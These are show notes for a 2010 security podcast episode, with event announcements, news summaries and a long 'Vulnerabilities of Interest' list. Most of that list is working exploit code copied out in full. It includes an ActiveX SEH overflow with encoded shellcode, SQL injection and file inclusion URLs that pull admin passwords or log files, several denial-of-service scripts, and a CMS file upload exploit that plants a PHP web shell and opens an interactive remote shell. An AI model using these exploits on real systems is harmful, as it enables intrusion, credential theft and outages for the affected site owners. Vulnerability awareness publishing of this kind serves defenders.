ISD Podcast Episode 121 for May 3, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:
MyHardDriveDied.com:
- MHDD Data Recovery Class current dates and locations:
- San Diego – May 10th-14th
- San Francisco – June 14th -18th
- Atlanta – July – 12th-16th
- Chicago – September – 13th – 17th
- Dallas, TX – October – 11th – 15th
- Washington DC – December 6th – 10th
- Cost is $3500 for all classes to reserve and register, call (678) 445-9007, email: [email protected] or go to http://www.myharddrivedied.com. Use the Discount Code: isdpodcast for a $300 discount.
SANS Community Atlanta:
- SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)
SANS Mentoring Program:
- Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538). Use the Discount Code: isdpod15 for a 15% discount.
Atlanta ISSA:
- ISSA Chapter is hosting a CISSP Workshop starting May 26 – August 14 (Preparing for the August 15, 2010 Exam) 6:00 to 9:00 PM 2 sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University. The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: [email protected].
- ISSA International Conference – September 16, 2010 (http://www.issa.org/page/?p=105)
North Alabama ISSA:
- Hosting Second annual North Alabama Cyber Security Summit to be held on June 9th in Huntsville AL. Event is open to ISSA members at a discounted price ($35 full price is $50).
- For more information please visit the North Alabama ISSA’s web site at: http://northalabama.issa.org/
Kentuckiana ISSA:
- 6.5 hour Metasploit class on May 8th 2010 from 10am to 4:30pm (http://www.irongeek.com/i.php?page=security/louisville-metasploit-class)
Friends of the Podcast:
Webhosting services:WebSpeedway
Vulnerabilities of Interest:
- Magneto Software Net Resource ActiveX is subject to a Local Buffer Overflow (SEH) vulnerability. Version 4.0.0.5 is impacted, though others may be as well. Proof of Concept code is available:
<html>
<object classid=’clsid:61251370-92BF-4A0E-8236-5904AC6FC9F2′ id=’target’ /></object>
<script language=’vbscript’>
‘Magneto Software Net Resource ActiveX v4.0.0.5 NetFileClose SEH Exploit (Universal)
‘Author: dookie
‘Original PoC by: s4squatch – http://www.exploit-db.com/exploits/12206
‘Vendor: http://www.magnetosoft.com/products/sknetresource/sknetresource_features.htm
‘SKNetResource.ocx
‘Function NetFileClose ( ByVal strServerName As String , ByVal dwFileId As Long ) As Long
‘progid = “SKNETRESOURCELib.SKNetResource”‘win32_exec - EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
shellcode = unescape(“%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%48%49″) & _
unescape(“%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%68″) & _
unescape(“%58%50%30%42%31%42%41%6b%41%41%78%32%41%42%32%42″) & _
unescape(“%41%30%42%41%41%58%38%41%42%50%75%59%79%39%6c%4a”) & _
unescape(“%48%50%44%63%30%35%50%43%30%4c%4b%57%35%77%4c%4c”) & _
unescape(“%4b%51%6c%35%55%64%38%77%71%6a%4f%4c%4b%62%6f%45″) & _
unescape(“%48%4e%6b%31%4f%45%70%55%51%6a%4b%73%79%6e%6b%70″) & _
unescape(“%34%6c%4b%46%61%7a%4e%70%31%4b%70%4e%79%6e%4c%6c”) & _
unescape(“%44%49%50%52%54%67%77%5a%61%59%5a%34%4d%55%51%6f”) & _
unescape(“%32%4a%4b%79%64%37%4b%51%44%41%34%35%54%71%65%6d”) & _
unescape(“%35%4e%6b%53%6f%47%54%65%51%4a%4b%31%76%4e%6b%46″) & _
unescape(“%6c%30%4b%6e%6b%51%4f%75%4c%54%41%58%6b%4c%4b%77″) & _
unescape(“%6c%6e%6b%66%61%58%6b%6d%59%33%6c%46%44%46%64%6a”) & _
unescape(“%63%35%61%6b%70%71%74%6e%6b%63%70%54%70%6f%75%6f”) & _
unescape(“%30%54%38%56%6c%4c%4b%61%50%36%6c%4e%6b%34%30%35″) & _
unescape(“%4c%4c%6d%6e%6b%43%58%75%58%58%6b%54%49%4c%4b%4d”) & _
unescape(“%50%6c%70%43%30%57%70%55%50%6e%6b%32%48%35%6c%71″) & _
unescape(“%4f%67%41%6b%46%53%50%56%36%6b%39%48%78%4d%53%4f”) & _
unescape(“%30%71%6b%32%70%33%58%4c%30%4d%5a%56%64%43%6f%52″) & _
unescape(“%48%6a%38%4b%4e%4c%4a%66%6e%31%47%4b%4f%6b%57%61″) & _
unescape(“%73%70%61%30%6c%71%73%64%6e%70%65%73%48%72%45%35″) & _
unescape(“%50%68″)‘SEH overwrite – Around 620 Bytes for Shellcode
lead = String(394, “A”)
nseh = unescape(“%eb%06%90%90″)
seh = unescape(“%bc%08%01%10″) ‘ 100108BC p/p/r in SKNetResource.ocx
trailer = String(312, “B”)arg1 = lead + nseh + seh + shellcode + trailer
arg2=1
target.NetFileClose arg1 ,arg2</script>
- Softbiz B2B trading Marketplace Script buyers_subcategories is subject to a SQL Injection vulnerability. Example URL is available: http://www.sample.com/buyers_subcategories.php?IndustryID=1+union+select+1,2,concat(LoginID,0x3d,password)+from+admin–
- Book Library .bkd file is subject to a Denial of Service vulnerability. Version 1.4.162 is impacted, though others may be as well. Proof of Concept code is available:
#!/usr/bin/env pythonimport time
print “The Encyclopedia of Unsolved Mysteries\n”
time.sleep(1)book=open(‘unsolved.bkd’, ‘w’)
book.write(‘\x00′)
book.close()print “UFO’s, Atlantis, Nessie, Oh My!\n”
- IBM BladeCenter Management Module is subject to a Denial of Service vulnerability. Attacker can reset management module by sending about five or ten malformed packets on remote presence port (3900/tcp). All users, who use management module and management network will be disconnected. Proof of Concept code is available:
#!/usr/bin/perl
#
# BladeCenter AMM DoS
# by Alexey Sintsov
# Digital Security Research Group
#
# [http://dsecrg.com]
#use Socket;
$target=’192.168.50.61′;
for ($i=1;$i<=20;$i++)
{
socket(SERVER, AF_INET, SOCK_STREAM, getprotobyname(‘tcp’));
$trash=”\xf1″x17;
$target_ = inet_aton($target);
$paddr=sockaddr_in(3900,$target_);sleep(2);
if (connect(SERVER, $paddr))
{
recv(SERVER,$buf,20,0);
send(SERVER,$trash,1);
close(SERVER);
print “$i – fire!\n”;
}
else
{
print “$i – refused!\n”;
}
}
print “\nDone\n”; - Mocha LPD is subject to a Denial of Service vulnerability. Version 1.9 is impacted, though others may be as well. Proof of Concept code is available:
#!/usr/bin/python
# #################################################################
# Mocha LPD v1.9 Remote Buffer Overflow DoS PoC
# Author: mr_me
# Software Link: http://mochasoft.dk/lpd.htm
# Version: 1.9
# Tested on: Windows XP SP3
# Advisory: http://www.corelan.be:8800/advisories.php?id=10-023
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# ##################################################################
# Script provided ‘as is’, without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages.
# ##################################################################
# Access violation here:
# MOV ECX,DWORD PTR DS:[EBX]
#
# The registers:
# EAX 00A2F978 ASCII “aaaaaaaaaaaaaaaaaaaaaaaaaaaa”..
# ECX 00006161
# EDX 00A20168
# EBX 61616161
# ESP 0012F4B8
# EBP 0012F6D4
# ESI 00A2F970 ASCII “aaaaaaaaaaaaaaaaaaaaaaaaaaaa”..
# EDI 61616161
# EIP 7C91AB8E ntdll.7C91AB8Eimport sys, socket
print “********************************************************”
print “ Mocha LPD Buffer Overflow DoS”
print “ by mr_me”
print “ http://net-ninja.net/ – mr_me(AT)corelan.be”
print “********************************************************”if len(sys.argv) < 3:
print “Usage: ” + sys.argv[0] + ” <target ip> <port>”
sys.exit(0)exploit = ‘\x05\x64\x65\x66\x61\x75\x6c\x74\x20′
exploit = ‘\x41′ * 1500
exploit += ‘\x20\x61\x6c\x6c\x0a’host = sys.argv[1]
port = int(sys.argv[2])s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect = s.connect((host,port))
except:
print “[-] Cant connect!”s.send(“\x02″)
print “[+] Sending evil payload.. ph33r o.O”
s.send(exploit)
print ‘[+] Server DoSed!’
s.close() - RPM Select/Elite (.xml config parsing) is subject to a Unicode Denial of Service vulnerability. Version 5.0 is impacted, though others may be as well. Proof of Concept code is available:
#!/usr/bin/python
# ####################################################################
# RPM Select/Elite v5.0 (.xml config parsing) unicode buffer overflow PoC
# Found by: mr_me – http://net-ninja.net/
# Homepage: http://lpd.brooksnet.com/
# Download: http://www.brooksnet.com/download-rpmselect
# Tested on: Windows XP SP3
# Advisory: http://www.corelan.be:8800/advisories.php?id=10-024
# Greetz: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# ####################################################################
# Notes: We overwrite EIP @ 32 bytes in, and the function doesnt copy
# enough of our string to hit SEH. However modules are compiled with
# SAFESEH anyway. Combine that with unicode and the printable ascii
# limitations, we are presented with to much of a hurdle.
# ####################################################################
# How to trigger the crash:
# file -> import configuration
# Click on the queue name, then click on the imported transform
# Click ‘modify transform’ and b00m!
# ####################################################################
# Script provided ‘as is’, without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages.header1 = “”"<RPM version=”5.0.70.6″>
<Queues>
<Queue>
<description>lol</description>
<seqno>0</seqno>
<enabled>1</enabled>
<actions>1</actions>
<held>0</held>
<running>0</running>
<name>mr_mes print queue</name>
<Transforms>
<Transform>
<LineWrap>0</LineWrap>
<lfPitchAndFamily>48</lfPitchAndFamily>
<lfOrientation>0</lfOrientation>
<lfFaceName>
“”"header2 = “”"</lfFaceName>
<lfWidth>0</lfWidth>
<UseCharsPerInch>0</UseCharsPerInch>
<lfItalic>0</lfItalic>
<UseLinesPerPage>0</UseLinesPerPage>
<lfEscapement>0</lfEscapement>
<LinesPerInch>6.000000</LinesPerInch>
<type>24</type>
<LeftMargin>0.500000</LeftMargin>
<PortraitMax>90</PortraitMax>
<CharsPerInch>10.000000</CharsPerInch>
<CharsPerLine>80</CharsPerLine>
<TopMargin>0.500000</TopMargin>
<LinesPerPage>60</LinesPerPage>
<lfQuality>2</lfQuality>
<lfStrikeOut>0</lfStrikeOut>
<lfWeight>400</lfWeight>
<FontSize>12</FontSize>
<lfUnderline>0</lfUnderline>
<BottomMargin>0.500000</BottomMargin>
<Orientation>portrait</Orientation>
<InputFormat>1252</InputFormat>
<CalcLayout>false</CalcLayout>
<UseLinesPerInch>1</UseLinesPerInch>
<RightMargin>0.500000</RightMargin>
<CtrlStrip>1</CtrlStrip>
<UseCharsPerLine>0</UseCharsPerLine>
<lfCharSet>1</lfCharSet>
<lfOutPrecision>0</lfOutPrecision>
<lfClipPrecision>0</lfClipPrecision>
<SuppressBlankPage>1</SuppressBlankPage>
<lfHeight>-16</lfHeight>
</Transform>
</Transforms>
<Jobs />
</Queue>
</Queues>
<Hosts />
</RPM>
“”"payload = “\x41″ * 32
payload += “\x42\x42″ # your “jmp to esp” instruction should go here
payload += “\x44″ * (5000-len(buffer))
exploit = header1.rstrip() + payload.rstrip() + header2.rstrip()
try:
f=open(“cst-rpm-config.xml”,’w')
f.write(exploit)
f.close()
print “[+] File created successfully !”
except:
print “[-] Error cannot write xml file to system\n” - Nucleus CMS is subject to a Local File Inclusion vulnerability. Version 3.51 is impacted, though others may be as well. Proof of Concept URL is available: http://www.sample.com/nucleus/plugins/skinfiles/index.php?DIR_LIBS=../../../var/log/httpd/access_log%00
- Camiro-CMS is subject to a Remote Arbitrary File Upload vulnerability. Version beta-0.1 is impacted, though others may be as well. Proof of Concept code is available: <?php
/*
—————————————————————–
Camiro-CMS_beta-0.1 (fckeditor) Remote Arbitrary File Upload Exploit
—————————————————————–
Download : http://camiro-cms.googlecode.com/files/Camiro-CMS_beta-0.1.tar.gz
exploited by ..: eidelweiss
special thnx to All Friends
details..: works with an Apache server with the mod_mime module installed[-] vulnerable code in path/app/webroot/js/fckeditor/editor/filemanager/connectors/php/config.php
[*] // SECURITY: You must explicitly enable this “connector”. (Set it to “true”).
[*]
[*] $Config['Enabled'] = true ;
[*]
[*] // Path to user files relative to the document root.
[*] $Config['UserFilesPath'] = str_replace(strstr($_SERVER['PHP_SELF'], ‘/app/webroot/’), “/”.$userFilesFolder.”files/”, $_SERVER['PHP_SELF']) ;
[*]
[*] // Fill the following value it you prefer to specify the absolute path for the
[*] // user files directory. Usefull if you are using a virtual directory, symbolic
[*] // link or alias. Examples: ‘C:\\MySite\\UserFiles\\’ or ‘/root/mysite/UserFiles/’.
[*] // Attention: The above ‘UserFilesPath’ must point to the same directory.
[*]
[*]
[*] $Config['AllowedExtensions']['File'] = array(’7z’, ‘aiff’, ‘asf’, ‘avi’, ‘bmp’, ‘csv’, ‘doc’, ‘fla’, ‘flv’, ‘gif’, ‘gz’, [....]
[*] $Config['DeniedExtensions']['File'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Image'] = array(‘bmp’,'gif’,'jpeg’,'jpg’,'png’) ;
[*] $Config['DeniedExtensions']['Image'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Flash'] = array(‘swf’,'flv’) ;
[*] $Config['DeniedExtensions']['Flash'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Media'] = array(‘aiff’, ‘asf’, ‘avi’, ‘bmp’, ‘fla’, ‘flv’, ‘gif’, ‘jpeg’, ‘jpg’, ‘mid’, ‘mov’, ‘mp3′, ‘mp4′, ‘mpc’, ‘mpeg’, ‘mpg’, ‘png’, ‘qt’, ‘ram’, ‘rm’, ‘rmi’, ‘rmvb’, ‘swf’, ‘tif’, ‘tiff’, ‘wav’, ‘wma’, ‘wmv’) ;
[*] $Config['DeniedExtensions']['Media'] = array() ;with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn’t properly checked
*/*/
error_reporting(0);
set_time_limit(0);
ini_set(“default_socket_timeout”, 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print “\n[-] No response from {$host}:80 Trying again…”;
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;$connector = “/app/webroot/js/fckeditor/editor/filemanager/connectors/php/config.php”;
$file_ext = array(“zip”, “jpg”, “fla”, “doc”, “xls”, “rtf”, “csv”);foreach ($file_ext as $ext)
{
print “\n[-] Trying to upload with .{$ext} extension…”;$data = “–abcdef\r\n”;
$data .= “Content-Disposition: form-data; name=\”NewFile\”; filename=\”0k.php.{$ext}\”\r\n”;
$data .= “Content-Type: application/octet-stream\r\n\r\n”;
$data .= “<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n”;
$data .= “–abcdef–\r\n”;$packet = “POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n”;
$packet .= “Host: {$host}\r\n”;
$packet .= “Content-Length: “.strlen($data).”\r\n”;
$packet .= “Content-Type: multipart/form-data; boundary=abcdef\r\n”;
$packet .= “Connection: close\r\n\r\n”;
$packet .= $data;preg_match(“/OnUploadCompleted\((.*),’(.*)’\)/i”, http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die(“\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n”);
$packet = “GET {$path}0k.php.{$ext} HTTP/1.0\r\n”;
$packet .= “Host: {$host}\r\n”;
$packet .= “Connection: close\r\n\r\n”;
$html = http_send($host, $packet);if (!eregi(“print”, $html) and eregi(“_code_”, $html)) return $ext;
sleep(1);
}return false;
}
print “\n+—————————————————————————+”;
print “\n| Camiro-CMS (fckeditor) Remote Arbitrary File Upload Exploit by eidelweiss |”;
print “\n+—————————————————————————+\n”;
if ($argc < 3)
{
print “\nUsage……: php $argv[0] host path\n”;
print “\nExample….: php $argv[0] localhost /”;
print “\nExample….: php $argv[0] localhost /Camiro/\n”;
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die(“\n\n[-] Exploit failed…\n”);
else print “\n[-] Shell uploaded…starting it!\n”;
define(STDIN, fopen(“php://stdin”, “r”));
while(1)
{
print “\Camiro-shell# “;
$cmd = trim(fgets(STDIN));
if ($cmd != “exit”)
{
$packet = “GET {$path}0k.php.{$ext} HTTP/1.0\r\n”;
$packet.= “Host: {$host}\r\n”;
$packet.= “Cmd: “.base64_encode($cmd).”\r\n”;
$packet.= “Connection: close\r\n\r\n”;
$html = http_send($host, $packet);
if (!eregi(“_code_”, $html)) die(“\n[-] Exploit failed…\n”);
$shell = explode(“_code_”, $html);
print “\n{$shell[1]}”;
}
else break;
}
?> - Joomla Component com_iproperty is subject to a SQL Injection vulnerability. Version 1.5.3 is impacted, though others may be as well. Google Dork “inurl:option=ccom_iproperty”. Proof of Concept url is available: http://www.sample.com/index.php?option=com_iproperty&view=agentproperties&id=[elich4]
- Php is subject to a Denial of Service (DoS) vulnerability. Version 5.3.0 is impacted, though others may be as well. Proof of Concept code is available:
<?php
$junk=str_repeat(“99999999999999999999999999999999999999999999999999″,99999);
for($i=0;$i<2;){
$buff=bcpow($junk, ’3′, 2);
$buff=null;
}
//Coded By Pejvak;
?>
Stories of Interest:
News item 1: http://www.darkreading.com/database_security/security/privacy/showArticle.jhtml?articleID=224600001
Affinity Health Plan, a New York managed care service, is notifying more than 400,000 current and former customers employees that their personal data may have been leaked through the loss of an unerased digital copier hard drive.
According to a press releasequietly issued earlier this month, some personal records were found on the hard drive of a copier found in a New Jersey warehouse. The copier had previously been leased by Affinity and was then returned to the leasing company, the release states.
The disclosure follows the airing of a CBS News report which calls attention to the practice of recycling or resale of copiers whose hard drives have not been properly erased.
The report showed the discovery of numerous medical records found on warehoused digital copiers. An executive at a company that makes hard-drive-erasure products used a free forensics tool to glean the data from one of the copiers in the CBS News report.
News item 2: http://securityblog.verizonbusiness.com/2010/04/22/redefining-security-researcher/
In an official blog post, an employee in Verizon’s Risk Intelligence unit has taken aim at researchers who disclose security flaws, calling them “Narcissistic vulnerability pimps” and comparing them to criminals.
“Have you ever heard of a terrorist referred to as a ‘demolition engineer?’” the unnamed author of the rant asked, one presumes rhetorically. “How about a thief as a ‘locksmith?’ No? Well, that’s because most fields don’t share the InfoSec industry’s ridiculous yet long-standing inability to distinguish the good guys from the bad guys.”
The post goes on to propose that a person who discloses security flaws henceforth be labeled a “narcissistic vulnerability pimp,” which the writer defines as “One who – solely for the purpose of
self-glorification and self-gratification – harms business and society by irresponsibly disclosing information that makes things less secure.”
Besides making security researchers out to be men in the “Joseph and the Amazing Technicolor Dreamcoat” with big ole’ feathere hats, this comparison is problematic for other reasons. As the recent Pwn2Own contest made abundantly clear, software makers can’t be counted on to secure their products, at least not on their own. Security researchers armed with real-world vulnerabilities provide an important check on internal security teams and give them a powerful incentive to be thorough in finding bugs and swift in fixing them.
News item 3: http://us.mcafee.com/en-us/landingpages/np5959.asp?cid=77220
Anti-virus firm McAfee is reimburse people who have spent money getting their computers fixed after they were damaged by the last security update.
An update of active viruses issued by McAfee last week falsely labelled part of the Windows operating system as a virus. This sent computers into a continuous reboot cycle and cut off network access.
Customers are asked to call a local, toll-free number to talk to a technician. If they are unable to fix the problem then a software fix can be downloaded to another machine. If this is not possible McAfee will send a CD.
If you have already spent money on fixing your machine then McAfee said it was “committed to reimbursing reasonable expenses”.